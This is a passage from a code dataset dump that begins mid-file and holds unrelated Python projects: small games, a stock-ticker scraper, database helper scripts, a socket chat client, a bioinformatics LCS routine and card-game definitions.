CompareCurrentCos(dict_old):\n\tcursor=conn.cursor()\n\tcursor.execute(sql.FindCurrentCos)\n\tcurrentCos=cursor.fetchall()\n\n\thot_cos={}\n\tfor key, value in dict_old.items():\n\t\tunique_id=key\n\t\told_cname=value['cos_cname']\n\t\told_tname=value['tname']\n\t\told_count=value['count']\n\t\t\n\t\tif(old_count>0):\n\t\t\tfor i in range(len(currentCos)):\n\t\t\t\tif currentCos[i]['cos_cname']==old_cname and currentCos[i]['tname']==old_tname:\n\t\t\t\t\thot_cos[old_cname]={}\n\t\t\t\t\turl=\"https://timetable.nctu.edu.tw/?r=main/crsoutline&Acy=107&Sem=2&CrsNo={}&lang=zh-tw\".format(currentCos[i]['cos_id'])\n\t\t\t\t\thot_cos[old_cname]['unique_id']=unique_id\n\t\t\t\t\thot_cos[old_cname]['count']=old_count\n\t\t\t\t\thot_cos[old_cname]['url']=url\n\treturn hot_cos\n\ndef InsertCos(grade, grade_dict):\n\tcursor=conn.cursor()\n\tcursor.execute(sql.DeleteRecord, {'grade': grade})\n\tfor key, value in grade_dict.items():\n\t\tdata={}\n\t\tdata['grade']=grade\n\t\tdata['unique_id']=value['unique_id']\n\t\tdata['count']=int(value['count'])\n\t\tdata['url']=value['url']\n\t\tcursor.execute(sql.InsertCos, data)\n\t\tconn.commit()\n\nlist_grade=['一', '二', '三', '四']\ndict_temp={}\n\nfor grade in list_grade:\n\tprint(\"Now calculate 大{}...\".format(grade))\n\tdict_temp=CountHistoryCos(grade)\n\tdict_temp=CompareCurrentCos(dict_temp)\n\tprint(\"Insert to db...\")\n\tInsertCos(grade, dict_temp)\n\nprint(\"Success!\")\n\n\n\n","repo_name":"NCTU-dinodino/Database","sub_path":"python/hot_cos/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35765514520","text":"from enum import IntEnum\n\nfrom ray.serve.exceptions import RayServeException\n\n\nclass TaskContext(IntEnum):\n \"\"\"TaskContext constants for queue.enqueue method\"\"\"\n Web = 1\n Python = 2\n\n\n# Global variable will be modified in worker\n# web == True: currrently processing a request from web server\n# web == False: currently processing a request from python\nweb = False\n\n# batching information in serve context\n# batch_size == None : the backend doesn't support batching\n# batch_size(int) : the number of elements of input list\nbatch_size = None\n\n_not_in_web_context_error = \"\"\"\nAccessing the request object outside of the web context. Please use\n\"serve.context.web\" to determine when the function is called within\na web context.\n\"\"\"\n\n\nclass FakeFlaskRequest:\n def __getattribute__(self, name):\n raise RayServeException(_not_in_web_context_error)\n\n def __setattr__(self, name, value):\n raise RayServeException(_not_in_web_context_error)\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"third_party/ray/serve/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"2417248337","text":"from lib.game import Game\nfrom lib.node import Node\nfrom lib.neural_network import Residual\nfrom lib.tree_search import MCTS\nfrom termcolor import colored\nfrom lib.human import Human\n\n\ndef print_board(board):\n for i in range(8):\n for j in range(8):\n if board[i][j] in set([-1, -2]):\n print(colored('(' + str(i) + ',' + str(j) + ')' + str(board[i][j]), 'red'), end='\\t')\n elif board[i][j] in set([1, 2]):\n print(colored('(' + str(i) + ',' + str(j) + ')' + str(board[i][j]), 'green'), end='\\t')\n else:\n print(colored('(' + str(i) + ',' + str(j) + ')' + str(board[i][j]), 'white'), end='\\t')\n print('')\n pass\n\n\nif __name__ == '__main__':\n net = Residual()\n net.load_model('models/model11')\n tree_search_1 = MCTS(net, Node())\n human = Human()\n game = Game()\n print('Game has started !')\n print_board(game.state)\n step = 1\n\n while game.check_game_over() == 0:\n clone = game.clone()\n # Player 1\n if step % 2 != 0:\n predicted_action, temp_children, temp_moves = tree_search_1.search(game.clone())\n game.play_action(predicted_action)\n print('Computer moved:', end='\\t')\n print('(' + str(predicted_action[0]) + ',' + str(predicted_action[1]) + ') -> (' + str(\n predicted_action[2]) + ',' +\n str(predicted_action[3]) + ')')\n if clone.if_attack_move(predicted_action):\n while game.attack_move_available(game.remove_except_current(predicted_action)):\n predicted_action, temp_children, temp_moves = tree_search_1.search(game.clone(), chain_move=True,\n action=predicted_action)\n game.play_action(predicted_action)\n print('Computer moved:', end='\\t')\n print('(' + str(predicted_action[0]) + ',' + str(predicted_action[1]) + ') -> (' + str(\n predicted_action[2]) + ',' +\n str(predicted_action[3]) + ')')\n\n # Player 2\n else:\n print_board(game.state)\n selected_move = human.get_move(game, chain=False)\n game.play_action(selected_move)\n print('Human moved:', end=\"\\t\")\n print('(' + str(selected_move[0]) + ',' + str(selected_move[1]) + ') -> (' + str(selected_move[2]) + ',' +\n str(selected_move[3]) + ')')\n if clone.if_attack_move(selected_move):\n while game.attack_move_available(\n game.remove_non_attacks(game.remove_except_current(selected_move))):\n selected_move = human.get_move(game, chain=True, prev_move=selected_move)\n game.play_action(selected_move)\n print('Human moved:', end=\"\\t\")\n print('(' + str(selected_move[0]) + ',' + str(selected_move[1]) + ') -> (' + str(\n selected_move[2]) + ',' +\n str(selected_move[3]) + ')')\n game.flip_perspective()\n step += 1\n if step > 120:\n break\n draw = True\n if draw:\n print('It is a Draw !')\n elif step % 2 == 0:\n print('Computer Won')\n else:\n print('Human Won')\n","repo_name":"shieda4/Thesis","sub_path":"against_human.py","file_name":"against_human.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10480168351","text":"import socket\nimport pickle\nSERVER_IP = \"192.168.0.136\"\n\n\nclass Network:\n def __init__(self, id_user=None):\n self.connector = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server = SERVER_IP\n self.id = id_user\n self.port = 5050\n self.server_address = (self.server, self.port)\n self.status = \"not connected\"\n self.user_created_status = None\n\n def connect(self):\n self.connector.connect(self.server_address)\n self.status = self.connector.recv(4096).decode()\n self.connector.send(str.encode(self.id))\n return self.connector.recv(4096).decode()\n\n def send(self, user, data):\n\n if user and data:\n self.connector.send(pickle.dumps(f\"{user}|{self.id}|{data}\"))\n else:\n self.connector.send(pickle.dumps(\"no data\"))\n return pickle.loads(self.connector.recv(4096))\n","repo_name":"bdrab/TextCommunicator-Socket","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26843995020","text":"import mysql.connector\nfrom mysql.connector import errorcode\nfrom datetime import datetime\nimport random\n\ntry:\n\tcnx = mysql.connector.connect(user='root', password=\"asdf\", host=\"127.0.0.1\", database='RateMyTJ')\nexcept Exception as err:\n\tprint(err)\n\ncursor = cnx.cursor()\ncursor.execute(\"SELECT id, prereq, coreq FROM classes\")\n\nresult = cursor.fetchall()\n\nclasses = set()\nfor item in result:\n\tclasses.add(item[0])\n\nfile = open(\"next_class.txt\", \"w\")\n\nfor item in result:\n\tclasses_to_add = set()\n\tif item[1] is not None:\n\t\twords = item[1].split(' ')\n\t\tfor w in words:\n\t\t\tif w == \"\": continue\n\t\t\tif w[0] == '(':\n\t\t\t\tclasses_to_add.add(w[1:])\n\t\t\telif w[-1] == ')':\n\t\t\t\tclasses_to_add.add(w[:-1])\n\t\t\telse:\n\t\t\t\tif w in classes:\n\t\t\t\t\tclasses_to_add.add(w)\n\t\n\tif item[2] is not None:\n\t\tclasses_to_add.add(item[2])\n\n\tfor c in classes_to_add:\n\t\tfile.write('UPDATE classes SET next_class=CONCAT(next_class, \" %s\") WHERE id=\"%s\";\\n' % (item[0], c))\n\n\tprint(item[0])\n\tprint(classes_to_add)\n","repo_name":"superandybean/RateMyTJ","sub_path":"python scripts/next_class.py","file_name":"next_class.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32516276965","text":"import statistics as s\n\nwhile True:\n\tlist1 = input(\"list : \")\n\tlist2 = []\n\tlist1 = list1.split(\";\")\n\n\tfor x in list1:\n\t\tx = x.replace('$', '')\n\t\tx = x.replace('\\qquad', '')\n\t\tlist2.append(float(x))\n\n\n\tdef moyenne(nb_point_virgule):\n\t\tprint(\"moyenne : {}\".format(s.mean(nb_point_virgule)))\n\n\n\tdef etendue(listnb):\n\t\tetendue = max(listnb) - min(listnb)\n\t\tprint(\"etendue : {0}\".format(etendue))\n\n\n\tetendue(list2)\n\tmoyenne(list2)\n","repo_name":"aLonelySquidNamedBob/Random-Projects","sub_path":"School/moyenne_+_etendue.py","file_name":"moyenne_+_etendue.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22125493081","text":"import time\nimport logging\nimport threading\n\nlog = logging.getLogger(f\"app.{__name__}\")\nstream_handler = logging.StreamHandler()\nformat = \"%(asctime)s %(levelname)s [%(name)s] [%(filename)s:%(lineno)d] - %(message)s\"\nstream_handler.setFormatter(logging.Formatter(format))\nlog.addHandler(stream_handler)\nlog.setLevel(logging.INFO)\n\n\ndef thread_func(name, d):\n \"\"\"메인 thread 가 끝나더라도 sub thread 가 작업을 완료함\"\"\"\n log.info(\"Sub-Thread %s : strting\", name)\n for i in d:\n time.sleep(0.1)\n print(i)\n log.info(\"Sub-Thread %s : finished\", name)\n\n\nif __name__ == \"__main__\":\n log.info(\"Main-Thread: before createing thread\")\n\n x = threading.Thread(target=thread_func, args=(\"first\", range(20000)), daemon=True)\n y = threading.Thread(target=thread_func, args=(\"two\", range(10000)), daemon=True)\n\n log.info(\"Main-Trhead : before running thread\")\n\n x.start()\n y.start()\n\n log.info(\"Main-Thread: wait for the thread to finish.\")\n\n log.info(\"Main-Thread: all done.\")\n","repo_name":"ricepotato/python-study","sub_path":"threading/th2.py","file_name":"th2.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18078487450","text":"import bs4 as bs\n# serialises any python object - save S& P 500 lsit without having to go back to wiki\nimport pickle\nimport requests\n\nimport datetime as dt\n# os can make new directories for us\nimport os\nimport pandas as pd\nimport pandas_datareader.data as web\n\n\ndef save_sp500_tickers():\n resp = requests.get('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\n soup = bs.BeautifulSoup(resp.text, 'lxml')\n table = soup.find('table', {'id':'constituents'})\n tickers = []\n for row in table.findAll('tr')[1:]:\n ticker = row.find('td').text.strip()\n if \".\" in ticker:\n ticker = ticker.replace('.', '-')\n print('ticker replaced to {}'.format(ticker))\n tickers.append(ticker)\n\n with open(\"sp500tickers.pickle\", \"wb\") as f:\n pickle.dump(tickers, f)\n\n print(\"Collected ticker data\")\n return tickers\n\ndef get_data_from_yahoo(reload_sp500=False):\n # saving this data locally to avoid 20/30 minute download from yahoo each iteration\n if reload_sp500:\n tickers = save_sp500_tickers()\n else:\n # wb = write bytes and rb = read bytes - ahhh!\n with open(\"sp500tickers.pickle\", \"rb\") as f:\n tickers = pickle.load(f)\n\n # checks is path exists and if not, creates it\n if not os.path.exists('stock_dfs'):\n os.makedirs('stock_dfs')\n\n start = dt.datetime(2000,1,1)\n end = dt.date.today()\n\n # for ticker in tickers[:25]: - this would select the first 25 companies in ticker list\n for ticker in tickers:\n if not os.path.exists('stock_dfs/{}.csv'.format(ticker)):\n df = web.DataReader(ticker, 'yahoo', start, end)\n df.to_csv('stock_dfs/{}.csv'.format(ticker))\n print('Successfuly downloaded data for {} from {} to {}'.format(ticker, start, end))\n else:\n print('Already have {}'.format(ticker))\n\nsave_sp500_tickers()\nget_data_from_yahoo()","repo_name":"DavidStewartLDN/python-stock-tracker","sub_path":"python-finance-6.py","file_name":"python-finance-6.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4923795715","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#This program is free software: you can redistribute it and/or modify\n#it under the terms of the GNU General Public License as published by\n#the Free Software Foundation, either version 3 of the License, or\n#(at your option) any later version.\n#\n#This program is distributed in the hope that it will be useful,\n#but WITHOUT ANY WARRANTY; without even the implied warranty of\n#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n#GNU General Public License for more details.\n#\n#You should have received a copy of the GNU General Public License\n#along with this program. If not, see \n#\n# Author: Francois Boulogne , 2012\n\n\n\"\"\"\nFunctions using (wrapping) bibtexparser\n\"\"\"\n\nfrom ZimBibliographer.bibtexparser import BibTexParser\nimport re\n\ndef get_filedirectory(bibtex):\n \"\"\"\n Get filedirectory from the bibfile\n (jabref)\n \"\"\"\n with open(bibtex, 'r') as bibfile:\n bibtex_content = bibfile.read()\n filedirectory = re.findall('@comment{jabref-meta: fileDirectory:(.+?);}', bibtex_content, re.DOTALL)\n if filedirectory == []:\n return None\n filedirectory = re.sub('\\n', '', filedirectory[0])\n\n return filedirectory\n\n\ndef get_entries(bibtex):\n \"\"\"\n Return entries from the bibfile\n \"\"\"\n with open(bibtex, 'r') as bibfile:\n bibliography = BibTexParser(bibfile)\n\n entries = bibliography.parse()[0] \n entries_hash = {}\n for entry in entries:\n entries_hash[entry['id']] = entry\n return entries_hash\n","repo_name":"DarioGT/ZimBibliographer","sub_path":"ZimBibliographer/bibtexutils.py","file_name":"bibtexutils.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31329790596","text":"import random\r\npt=0\r\nno_matches=0\r\nwhile (1):\r\n cgn = random.randint(1,9)\r\n \r\n for i in range(1,4):\r\n un = int(input('Enter Guess{} :'.format(i)))\r\n \r\n if i == 1 and un == cgn:\r\n pt+=10\r\n elif i==2 and un == cgn:\r\n pt+=6\r\n elif i==3 and un == cgn:\r\n pt+=4\r\n else:\r\n pt+=0\r\n \r\n if un>9 or un<1:\r\n print('Enter Number between 1 and 9 only')\r\n print('Number of Attempts left: ',3-i)\r\n elif un == cgn:\r\n print('Correct Guess')\r\n print('You choose {} Computer Choose {}'.format(un,cgn))\r\n break\r\n elif un > cgn:\r\n print('Guess is high')\r\n print('Number of Attempts left: ',3-i)\r\n else :\r\n print('Guess is low')\r\n print('Number of Attempts left: ',3-i)\r\n\r\n \r\n print()\r\n ch =input('Do u want to play again?').lower().strip()[0]\r\n no_matches+=1\r\n if ch == 'n':\r\n break\r\nprint()\r\nprint('Number of Matches Played: ',no_matches)\r\nprint('Points Gained: ',pt)\r\n \r\n","repo_name":"neel1810/Number-Guess-with-score-board","sub_path":"k2.py","file_name":"k2.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6755715240","text":"from queue import Empty\n\nimport pytest\nfrom bluesky.tests.utils import DocCollector\n\nfrom bluesky_adaptive.per_start import adaptive_plan, recommender_factory\nfrom bluesky_adaptive.recommendations import SequenceRecommender\n\n\ndef test_seq_recommender(RE, hw):\n recommender = SequenceRecommender(\n [\n [\n 1,\n ],\n [\n 2,\n ],\n [\n 3,\n ],\n ]\n ) # noqa\n\n cb, queue = recommender_factory(recommender, [\"motor\"], [\"det\"])\n dc = DocCollector()\n\n # pre-poison the queue to simulate a messy reccomender\n queue.put(None)\n queue.put({})\n\n RE(\n adaptive_plan([hw.det], {hw.motor: 0}, to_recommender=cb, from_recommender=queue),\n dc.insert,\n )\n\n assert len(dc.start) == 4\n assert len(dc.event) == 4\n for ev in dc.event.values():\n assert len(ev) == 1\n\n # check that our reccomender does not leave anything behind\n with pytest.raises(Empty):\n queue.get(block=False)\n","repo_name":"bluesky/bluesky-adaptive","sub_path":"bluesky_adaptive/tests/test_per_start.py","file_name":"test_per_start.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71853197866","text":"'''\nCode Challenge: Use OutputLCS (reproduced below) to solve the Longest Common Subsequence Problem.\n >>Input: Two strings s and t.\n >>Output: A longest common subsequence of s and t. (Note: more than one solution may exist, in which case you may output any one.)\n----------------\nSample Input:\nAACCTTGG\nACACTGTGA\n----------------\nSample Output:\nAACTGG\n'''\n\ndef Build_LCS_Graph(text1,text2,l1,l2):\n\timport numpy\n\tPath = numpy.zeros([l2-1,l1-1])\n\tGraph = numpy.zeros([l2,l1])\n\tfor x in range(1,l2):\n\t\tfor y in range(1,l1):\n\t\t\tif text1[y] == text2[x]:\n\t\t\t\tGraph[x][y] = max(Graph[x-1][y],Graph[x][y-1],Graph[x-1][y-1]+1)\n\t\t\telse:\n\t\t\t\tGraph[x][y] = max(Graph[x-1][y],Graph[x][y-1])\n\treturn Graph\n\ndef OutputLCS(Graph,l1,l2):\n\tx = l2-1\n\ty = l1-1\n\toutput = ''\n\twhile(x!=0 and y!=0):\n\t\tif Graph[x][y]==Graph[x-1][y]:\n\t\t\tx-=1\n\t\telif Graph[x][y]==Graph[x][y-1]:\n\t\t\ty-=1\n\t\telse:\n\t\t\toutput+=text1[y]\n\t\t\tx-=1\n\t\t\ty-=1\n\n\tprint(output[::-1])\t\t\n\nif __name__ == \"__main__\":\n\t\tfrom os.path import dirname\n\t\t\n\t\tdataset = open(dirname(__file__)+'dataset.txt').read().strip().split('\\n')\n\t\ttext1 = '0'+dataset[0]\n\t\ttext2 = '0'+dataset[1]\n\t\tl1 = len(text1)\n\t\tl2 = len(text2)\n\t\tGraph = Build_LCS_Graph(text1,text2,l1,l2)\n\t\tOutputLCS(Graph, l1, l2)","repo_name":"luoguanghao/bioinfo_algo_script","sub_path":"M3_Week1_LongestCommonSubsequence.py","file_name":"M3_Week1_LongestCommonSubsequence.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24067473928","text":"#!/usr/bin/python3\n\"\"\"\n This module defines a single function\n that enables the addition of attributes\n\"\"\"\n\n\ndef add_attribute(obj, attr=\"\", value=\"\"):\n \"\"\"\n This function will add an attribute\n to the object obj if possible\n \"\"\"\n if len(dir(obj)) > 30:\n raise TypeError(\"can't add new attribute\")\n else:\n setattr(obj, attr, value)\n","repo_name":"awolcat/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/101-add_attribute.py","file_name":"101-add_attribute.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27523483636","text":"from django.shortcuts import render\nfrom django.http import Http404, HttpResponseForbidden, HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nimport threading\nimport time\n\nfrom . import parser_buckwheat, parser_millet, parser_sugar\n\ndef index(request):\n buckwheat = []\n sugar = []\n millet = []\n task1 = threading.Thread(target=parser_buckwheat.parse, kwargs={'arr': buckwheat})\n task2 = threading.Thread(target=parser_sugar.parse, kwargs={'arr': sugar})\n task3 = threading.Thread(target=parser_millet.parse, kwargs={'arr': millet})\n #started_at = time.time()\n task1.start()\n task2.start()\n task3.start()\n task1.join()\n task2.join()\n task3.join()\n #print(f'Time: {time.time() - started_at}')\n return render(request, 'index.html', {'buckwheat_list': buckwheat, 'sugar_list': sugar, 'millet_list': millet})\n","repo_name":"chimchima/INT20H","sub_path":"hackathon_parser/apps/parsing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18284006203","text":"__env__ = '''Envs]\n Python 3.9.7 64-bit(conda 4.11.0)\n macOS 12.1\n'''\n__version__ = '''Version]\n version 0.01(beta)\n'''\n__doc__ = '''\\\nThis module contains various utilities.\n'''+ __env__+__version__\nimport tensorflow as tf\n\n\n# print tabular data\ndef print_table(col_names, *cols, tab_width=50, just='right'):\n '''Make and print a table that consists of multiple columns.\n \n The length of 'col_names' should be the same as of 'cols'.\n\n Params]\n col_names: A list of column names\n cols: Vector like 1D variables, each of which will be a column of the table sequentially\n tab_width (optional): An width of a table. default = 50\n just (optional): Justification option. 'center' and 'right' are acceptible. default = 'right'\n '''\n # Assume that len(col_names) == len(cols) holds.\n if len(col_names) != len(cols):\n raise ValueError('Length of col_names and cols should be same')\n # Column names\n print(\"=\"*tab_width)\n cols_str = ''.join([str(name).center(int((tab_width//len(col_names))*0.95)) \n for name in col_names])\n print(cols_str)\n print('-'*tab_width)\n \n # get the maximum length of contents, respect to each column\n max_data_len = []\n for col in cols:\n max_len = 0\n for i in range(len(col)):\n if max_len < len(str(col[i])):\n max_len = len(str(col[i]))\n max_data_len.append(max_len)\n\n # print data row by row, propotionally indented to the length of each column\n for row in range(len(cols[0])):\n # right justification\n if just =='right':\n row_str = ''.join([str(data[row]).rjust(max_data_len[i]).center(tab_width // len(cols))\n for i, data in enumerate(cols)])\n # center justification\n elif just =='center':\n row_str = ''.join([str(data[row]).center(max_data_len[i]).center(tab_width // len(cols))\n for i, data in enumerate(cols)])\n print(row_str)\n \n print('='*tab_width)\n\n# decode image file from path and resize\ndef decode_img(img, IMG_HEIGHT, IMG_WIDTH):\n img = tf.image.decode_jpeg(img, channels=3)\n img = tf.image.resize(img, [IMG_HEIGHT, IMG_WIDTH])\n img = tf.cast(img, tf.float32)\n \n return img\n\n\ndef config_for_performance(ds, batchsize=512, cache=True):\n if cache:\n if isinstance(cache, str):\n ds = ds.cache(cache)\n else:\n ds = ds.cache()\n \n AUTOTUNE = tf.data.experimental.AUTOTUNE\n ds = ds.shuffle(buffer_size=1000)\n ds = ds.repeat()\n ds = ds.batch(batchsize)\n ds = ds.prefetch(buffer_size=AUTOTUNE)\n return ds\n\n\ndef train_test_split_ds(ds, ratio=0.2):\n val_size = int(len(ds) * ratio)\n train_ds = ds.skip(val_size)\n val_ds = ds.take(val_size)\n\n return train_ds, val_ds\n\n\n\n# Get model size\n# https://stackoverflow.com/questions/43137288/how-to-determine-needed-memory-of-keras-model\ndef get_model_memory_usage(batch_size, model):\n import numpy as np\n try:\n from keras import backend as K\n except:\n from tensorflow.keras import backend as K\n\n shapes_mem_count = 0\n internal_model_mem_count = 0\n for l in model.layers:\n layer_type = l.__class__.__name__\n if layer_type == 'Model':\n internal_model_mem_count += get_model_memory_usage(batch_size, l)\n single_layer_mem = 1\n out_shape = l.output_shape\n if type(out_shape) is list:\n out_shape = out_shape[0]\n for s in out_shape:\n if s is None:\n continue\n single_layer_mem *= s\n shapes_mem_count += single_layer_mem\n\n trainable_count = np.sum([K.count_params(p) for p in model.trainable_weights])\n non_trainable_count = np.sum([K.count_params(p) for p in model.non_trainable_weights])\n\n number_size = 4.0\n if K.floatx() == 'float16':\n number_size = 2.0\n if K.floatx() == 'float64':\n number_size = 8.0\n\n total_memory = number_size * (batch_size * shapes_mem_count + trainable_count + non_trainable_count)\n gbytes = np.round(total_memory / (1024.0 ** 3), 3) + internal_model_mem_count\n return gbytes","repo_name":"three0-s/DeepWon","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69854479788","text":"# Copyright 2023 DEViantUa \r\n# All rights reserved.\r\nfrom PIL import Image\r\nimport threading\r\nfrom weakref import WeakValueDictionary\r\nfrom pathlib import Path\r\n\r\nassets = Path(__file__).parent.parent / 'assets'\r\nfont = str(assets / 'font_hsr.ttf')\r\n\r\nmapping = {\r\n \r\n 'default': assets/'background'/'default.png',\r\n 'default_maska': assets/'background'/'default_maska.png',\r\n 'dark': assets/'background'/'dark.png',\r\n 'frame_mask': assets/'background'/'frame_mask.png',\r\n 'default_freme_line': assets/'background'/'default_freme_line.png',\r\n 'adapt_freme_line': assets/'background'/'adapt_freme_line.png',\r\n \r\n 'eidolon_open': assets/'eidolon'/'open.png',\r\n \r\n 'eidolon_electro_open': assets/'eidolon'/'electro.png',\r\n 'eidolon_fire_open': assets/'eidolon'/'fire.png',\r\n 'eidolon_ice_open': assets/'eidolon'/'ice.png',\r\n 'eidolon_imagunary_open': assets/'eidolon'/'imagunary.png',\r\n 'eidolon_physikal_open': assets/'eidolon'/'physikal.png',\r\n 'eidolon_quantom_open': assets/'eidolon'/'quantom.png',\r\n 'eidolon_wind_open': assets/'eidolon'/'wind.png',\r\n \r\n 'talants_background': assets/'talants'/'background.png',\r\n 'default_frame': assets/'talants'/'default_frame.png',\r\n 'adaptationt_frame': assets/'talants'/'adaptationt_frame.png',\r\n 'count': assets/'talants'/'count.png', \r\n \r\n 'main_stats': assets/'talants'/'main_stats.png',\r\n 'mini_stats': assets/'talants'/'mini_stats.png',\r\n 'line_stats': assets/'talants'/'line.png',\r\n \r\n \r\n 'background_up': assets/'relict'/'background_up.png',\r\n 'frame_up': assets/'relict'/'frame_up.png',\r\n 'background_centry': assets/'relict'/'background_centry.png',\r\n 'frame_centry': assets/'relict'/'frame_centry.png',\r\n 'background_down': assets/'relict'/'background_down.png',\r\n 'frame_down': assets/'relict'/'frame_down.png',\r\n 'relict_maska': assets/'relict'/'maska.png',\r\n 'relict_line': assets/'relict'/'line.png',\r\n 'count_level': assets/'relict'/'count_level.png',\r\n 'sets_count': assets/'relict'/'sets_count.png',\r\n \r\n \r\n 'shadow_3_light_cone': assets/'light_cones'/'3_shadow_lc.png',\r\n 'star_3_frame_light_cone': assets/'light_cones'/'3_star_frame_lc.png',\r\n 'shadow_4_light_cone': assets/'light_cones'/'4_shadow_lc.png',\r\n 'star_4_frame_light_cone': assets/'light_cones'/'4_star_frame_lc.png',\r\n 'shadow_5_light_cone': assets/'light_cones'/'5_shadow_lc.png',\r\n 'star_5_frame_light_cone': assets/'light_cones'/'5_star_frame_lc.png',\r\n 'blic_light_cones': assets/'light_cones'/'blic.png',\r\n 'frame_light_cones': assets/'light_cones'/'frame_lc.png',\r\n 'maska_light_cones': assets/'light_cones'/'maska_lc.png',\r\n 'stats_light_cones': assets/'light_cones'/'stats.png',\r\n \r\n \r\n 'stars_5': assets/'stars'/'stars_5.png',\r\n 'stars_4': assets/'stars'/'stars_4.png',\r\n 'stars_3': assets/'stars'/'stars_3.png',\r\n 'stars_2': assets/'stars'/'stars_2.png',\r\n 'stars_1': assets/'stars'/'stars_1.png',\r\n \r\n \r\n}\r\n\r\nclass ImageCache:\r\n def __init__(self):\r\n self.mapping = mapping\r\n self.cache = WeakValueDictionary()\r\n self.lock = threading.Lock()\r\n self.assets = assets\r\n\r\n def __dir__(self):\r\n return sorted(set([*globals(), *self.mapping]))\r\n\r\n def __getattr__(self, name):\r\n path = self.mapping.get(name)\r\n if not path:\r\n raise AttributeError(name)\r\n \r\n with self.lock:\r\n try:\r\n image = self.cache[name]\r\n except KeyError:\r\n self.cache[name] = image = Image.open(self.assets / path)\r\n \r\n return image","repo_name":"DEViantUA/HSRCard","sub_path":"hsrcard/src/tools/openfile.py","file_name":"openfile.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"34020463163","text":"from __future__ import annotations\n\nfrom l5r_auto.clans import LionClan\nfrom l5r_auto.keywords import (\n Beastmaster,\n Commander,\n Duelist,\n Experienced,\n Magistrate,\n Reserve,\n Resilient,\n Samurai,\n ScionOfStone,\n Tactician,\n Unique,\n)\nfrom l5r_auto.legality import ModernEdition, OnyxEdition, TwentyFestivalsEdition\n\nfrom ..common import Personality\n\n\"Increase Kano's Force bonuses from the rulebook Tactical Advantage action by 2 if he has a Tessen.
Battle: Give a target Battle Strategy without Discipline in your discard pile Discipline :g2:.\"\nAkodo_Kano_Master_Tactician_Experienced_2 = Personality(\n card_id=12302,\n title=\"Akodo Kano, Master Tactician\",\n force=3,\n chi=4,\n personal_honor=4,\n gold_cost=9,\n honor_requirement=12,\n clan=[LionClan],\n keywords=[Experienced(\"2\"), Tactician, Unique, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"Iaijutsu Battle: Naotaka challenges a target enemy Personality. Give the winner +2F.\"\nAkodo_Naotaka = Personality(\n card_id=12303,\n title=\"Akodo Naotaka\",\n force=3,\n chi=3,\n personal_honor=3,\n gold_cost=6,\n honor_requirement=0,\n clan=[LionClan],\n keywords=[Duelist, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"Toshigure has -1C while dueling Doji Moro. Toshigure has +1PH if he won a duel this turn or you are Mantis Clan.\"\nAkodo_Toshigure = Personality(\n card_id=12304,\n title=\"Akodo Toshigure\",\n force=3,\n chi=3,\n personal_honor=2,\n gold_cost=4,\n honor_requirement=7,\n clan=[LionClan],\n keywords=[Duelist, Samurai],\n traits=[],\n abilities=[],\n legality=[TwentyFestivalsEdition, OnyxEdition, ModernEdition],\n)\n\"(Once per game per card, a Resilient card does not die in battle resolution.)
